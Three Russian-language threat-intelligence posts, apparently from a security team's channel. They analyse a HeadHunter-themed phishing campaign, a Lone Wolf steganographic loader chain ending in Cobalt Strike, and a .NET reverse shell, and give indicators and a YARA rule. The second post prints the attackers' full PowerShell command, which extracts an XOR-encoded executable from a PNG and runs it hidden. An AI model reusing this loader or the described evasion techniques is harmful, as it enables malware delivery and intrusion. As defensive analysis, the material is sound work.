«Я буду *** твоих рыб» 🐟

В середине октября группа киберразведки засекла фишинговую активность в адрес HR-подразделений строительного сектора.

Злоумышленники рассылали письма якобы от HeadHunter с требованием верифицировать аккаунт на стороннем сайте. Введенные на этой странице email и одноразовый код использовались для перехвата учетной записи, после чего жертва теряла к ней доступ (скриншот 1).

Ссылка ведет на фишинговый домен hhcasa.xyz, который закрыт за Cloudflare и зарегистрирован с помощью главного регистратора доменов Украины nic.ua (скриншот 2).

Страница имеет два состояния интерфейса. При наличии auth=1 показывается основная сцена «успешного шага», при отсутствии — альтернатива (скриншоты 3–4).

Такое разделение используется для сокрытия страницы от лиц, не попавших в список рассылки.

🪞 Верстка и статика копируют hh.ru: в <head> тянутся Google Fonts и favicon с i.hh.ru, логотип и шапка повторяют стиль, а пункты навигации кликабельны и направляют пользователя на легитимный домен simferopol.hh.ru, что создает впечатление «чистого» сайта. Однако в навигации присутствует пункт «Зарегестрироваться» с орфографической ошибкой, что выступает индикатором подмены сайта.

На фишинговой странице имитируется связка «почта → код подтверждения». Пользователь вводит email, скрипт проверяет формат регулярным выражением и делает POST-запрос, в тело которого кладут еще и токен формата Base64, который генерируется прямо в браузере из User-Agent, текущего времени и случайной строки.

❗️ Отметим, что в марте этого года нами уже фиксировалась аналогичная фишинговая кампания от имени HeadHunter. Тогда в навигации тоже присутствовал пункт «Зарегестрироваться» с той же характерной ошибкой, и с тем же принципом компрометации аккаунта: связка «почта → одноразовый код → перехват учетной записи» с последующей потерей доступа.

Злоумышленники также собирают телеметрию. Она реализована через создание объекта Image и присвоение ему src, чтобы браузер отправил GET на внешний адрес с параметрами домена и меткой времени (скриншот 5).

Задача сбора телеметрии утилитарная: оператор видит реальный IP посетителя и время захода на конкретный домен, что может говорить о наличии у операторов дополнительных фишинговых доменов.

IP-адрес 185.162.10.35, на который отправляется телеметрия, находится в ASN 59729 (GREEN FLOID LLC). По результатам анализа и pDNS-наблюдений, на этом IP также размещаются и ранее размещались другие фишинговые домены, которые, так же как и hhcasa.xyz, были зарегистрированы с помощью nic.ua.

hhrunaх.xyz;
hscac.xyz;
hmnsc.xyz.

🖕 Фишинговый домен имеет антиотладку. Скрипт перехватывает контекстное меню, выделение и копирование, горячие сочетания клавиш, которыми обычно открывают исходники и DevTools: Ctrl+U, Ctrl+S, Ctrl+Shift+I/J/C и F12. При срабатывании «запрещенной» клавиши страница стирает содержимое body и накладывает поверх черный полноэкранный блок с сообщением (скриншоты 6–7).

В защите нет ничего сложного: она не умеет обнаруживать открытые DevTools и никак не прячет исходники вне текущего документа. Самый простой способ обойти ее — открыть DevTools через меню браузера до загрузки страницы или отключить выполнение JavaScript для этого домена и перезагрузить вкладку, чтобы снять HTML и статические ресурсы.

Помимо комментариев на русском языке в коде, в разметке оставлена украинская раскладка: в теге <html> задан lang="ua", вероятно, этот атрибут проставился автоматически при генерации шаблона и его просто забыли поменять.

📝 В самом фишинговом письме группировка использовала логотип HH, который подгружался из GitHub-репозитория (скриншот 8). Репозиторий (скриншот 9) создан в октябре 2022 года и содержит проекты фишинговых сайтов, в одном из которых находился самописный стилер, накрытый протектором. Вредоносное ПО при запуске ворует куки и пары «логин — пароль», отправляя все в телеграм-канал злоумышленника.

Телеграм-аккаунт, куда бот отправляет украденные данные, также мимикрирует под сотрудника компании HeadHunter (скриншот 10).

#TI #Phishing
@ptescalator

Одинокий волк тебе не товарищ 🐺

Группа киберразведки зафиксировала очередную фишинговую кампанию группировки Lone Wolf: злоумышленники используют стеганографию для скрытой доставки загрузчика вредоносного ПО.

Жертве отправляют архив (скриншот 1) с двумя файлами: размытым изображением «досудебное.png» (скриншот 2) и ярлыком «сверка.lnk». Открытие ярлыка приводит к запуску PowerShell с параметрами скрытого окна и обходом политики выполнения.

-WindowStyle Hidden -ExecutionPolicy Bypass -Command 
"$data=[IO.File]::ReadAllBytes('досудебное.png');
$key=$data[144];
$file=$env:TEMP+'\yVLQbWaX.exe';
$i=[Text.Encoding]::ASCII.GetString($data).LastIndexOf('IDAT')+4;
$xdata = ($data[$i..$data.Length] | ForEach-Object { $_ -bxor $key }); [IO.File]::WriteAllBytes($file, $xdata); 
Start-Process -FilePath $file -WindowStyle Hidden"

👨‍🎨 При запуске скрипт читает байты изображения, берет ключ из 145-го байта и находит в ASCII-представлении последний маркер PNG-чанка IDAT. Затем берет все, что идет за ним, декодирует с помощью XOR и сохраняет результат во временном каталоге как %TEMP%\yVLQbWaX.exe, после чего запускает его. Таким образом, изображение выступает контейнером для полезной нагрузки с параметрами скрытого окна и обходом политики выполнения. Примененная техника извлечения из сегмента IDAT концептуально повторяет подход, ранее замеченный в семействе загрузчиков IDAT Loader (HijackLoader), что указывает на переиспользование или заимствование решений из существующего вредоносного ПО.

Запущенный yVLQbWaX.exe обращается по адресу ezstat.ru/flowersforlove.gif. Указанный домен при обращении перенаправляет на контролируемый злоумышленниками ресурс valisi.ru, на котором фактически размещен вредоносный HTA-файл. Его выполняет системная утилита mshta.exe.

Внутри HTA-файла содержится код на VBScript, который вновь запускает PowerShell для распаковки Base64-строки как файла gzip в памяти и для дальнейшего запуска результата. Анализ показал, что итоговый шеллкод соответствует Beacon — полезной нагрузке Cobalt Strike. Финальный этап реализует «бесфайловое» выполнение в оперативной памяти через рефлективную загрузку.

🎭 Вся цепочка демонстрирует последовательную многоступенчатую маскировку:

• стеганография в PNG (T1027.003) + обфускация или кодирование (T1027, T1140);
• пользовательское выполнение LNK-файла (T1204.002) в рамках фишинга с вложением (T1566.001);
• загрузка удаленного компонента (HTA-файла) по сети (T1105);
• выполнение HTA-файла через прокси-сервер с помощью mshta.exe (T1218.005);
• использование скриптовых интерпретаторов (VBScript, PowerShell) в качестве средств развертывания (T1059.005, T1059.001);
• рефлективная загрузка и выполнение полезных нагрузок в памяти (T1620).

💡 Сетевая инфраструктура, с которой взаимодействует вредоносное ПО, не менялась с марта текущего года.

IoCs

Домены

valisi.ru
ecols.ru

IP-адреса

91.218.228.26
188.120.232.76

Хеш-суммы

ec2924d70d86d24e911202b1523c1858
ae7996444c3d9dbc66c6768993a032c3ca39cc59
6b139dec14e03afdaa6ac51415a9d097eaddb9b7ebba5f77575404c5395ff778

bc957c0d268732c83c4b1a33a37a5854
7c5e95a312567541c9839b9aeefdb66f8b92ffe8
ae8c52e498f5c9a328cf9a2b18b5caf11b677108c4da6ac556a66ccb99faba17

38bcebee4a5c0a18a4794ad7c882e536
af2c5c5113389b16351577837087d2a5f618edca
dcee83c2859df268528002c8b5cdfb2d7821985b36e5b5fab8eb9de4cbc812e1

aed3b15ef7c731cdc8e84c0de42adcdc
bc3a04ccdd5e7de167d2f4d3e75239087075e03c
2d91100a95a2d26c8bcf42dea5aeddb3bfad84b1827bc1b7670a9eac8a0936b8

Дополнительные индикаторы

gemme-cotti.ru
seko-group.ru
run-xin.ru
mzmz.ru
igran.ru
dewatering.ru
clwater.ru
ivaco.su
hydrochem.ru
гидрохим.рф

#TI #APT #Phishing
@ptescalator

Новое подключение к старым техникам 📡

В ходе расследования инцидентов команда PT ESC IR обнаружила реверс-шелл, разработанный на .NET и наблюдаемый с 2023 года. Злоумышленниками он использовался для управления скомпрометированными хостами. ВПО создает процесс cmd.exe и перенаправляет поток ввода/вывода на управляющий сервер, который, как правило, являлся одним из хостов во внутренней инфраструктуре. Для безопасного сетевого соединения использовалась техника защищенного TCP-клиента с SSL/TLS.

❕ Особенность инструмента в том, что он реализован средствами компонента System.Windows.Data из состава Windows Presentation Framework. Сама техника не новая — примитивы выполнения кода с использованием System.Windows.Data активно применяются при эксплуатации уязвимостей. Рассмотрим его реализацию подробнее.

В функции Main (скриншот 1) демонстрируется техника прямого выполнения через ObjectDataProvider из пространства имен System.Windows.Data. Несмотря на отсутствие явного вызова метода, при последовательной настройке свойств ObjectInstance, MethodParameters и, в завершение, MethodName объект автоматически инициирует выполнение указанного метода (Connect.Start) — прямо во время его инициализации в методе Main. Использование обертки ExpandedWrapper<Connect, ObjectDataProvider> указывает на заимствование паттерна из известных gadget-цепочек для десериализации, хотя в данном случае эксплуатация происходит напрямую, без этапа сериализации.

Метод Connect.Start (скриншот 2) запускает системную командную оболочку (cmd.exe) в качестве дочернего процесса, асинхронно перехватывает ее вывод через обработчик P_OutputDataReceived и перенаправляет данные обратно на C2-сервер, одновременно используя кастомный делегат (Delegate.Combine) для динамической связи с компонентом Px, отвечающим за сетевую передачу команд и результатов. Такая архитектура позволяет злоумышленнику выполнять произвольные команды в контексте cmd.exe на зараженной машине, сохраняя взаимодействие основанным на легитимных API .NET.

В методе Net.Run (скриншот 3) реализована сетевая C2-логика, устанавливающая зашифрованное соединение с удаленным сервером через TcpClient и SslStream с принудительным использованием TLS 1.2; IP-адрес и порт берутся из зашифрованных конфигурационных данных (скриншот 4) и расшифровываются «на лету» с помощью AES256 в режиме CBC/NoPadding, причем для генерации ключа используется PBKDF2 (RFC 2898), на вход которого передается строковое значение пароля и соли (скриншот 5).

Для расшифровки данных конфигурации можно воспользоваться следующими рецептами CyberChef:

1. Генерация ключа, в который необходимо передать App.PasswordHash и App.SaltKey;

2. Алгоритм расшифровки.

🗂 Вредоносные файлы были расположены в легитимных каталогах:

• C:\Program Files\Internet Explorer\mshealthupdate.exe

• C:\Program Files\Common Files\System\msadds.exe

• C:\Program Files\Common Files\System\ado\msader.exe

Для закрепления в инфраструктуре и запуска исполняемых файлов злоумышленники использовали планировщик задач Windows.

Данный инструмент схож с реализацией общеизвестной утилиты ncat. Для вызова вредоносного метода используется легитимный класс ObjectDataProvider из системной библиотеки WPF, применяются делегаты для динамического подключения обработчиков, не оставляя четкой цепочки вызовов в IL-коде. Для шифрования вывода консоли используется TLS 1.2 и игнорируются ошибки сертификата (ValidateServerCertificate => true), что позволяет работать с любым C2, включая динамические IP.

YARA:

rule MSADDShell {
    strings:
        $v1 = "net_handlerDelOutDataNet"
        $v2 = "P_OutputDataReceived"
        $v3 = "add_OutputDataReceived"
        $v4 = "SendDataFwd"
        $v5 = "OnhandlerDelFwfPx"
        $v6 = "OnhandlerDelOutDataNet"
        $v7 = "msadds.exe" wide
    condition:
        uint16(0) == 0x5A4D and 5 of ($v*) and filesize < 100KB
}

#IOC #yara #dfir #detect #win #ti #ir
@ptescalator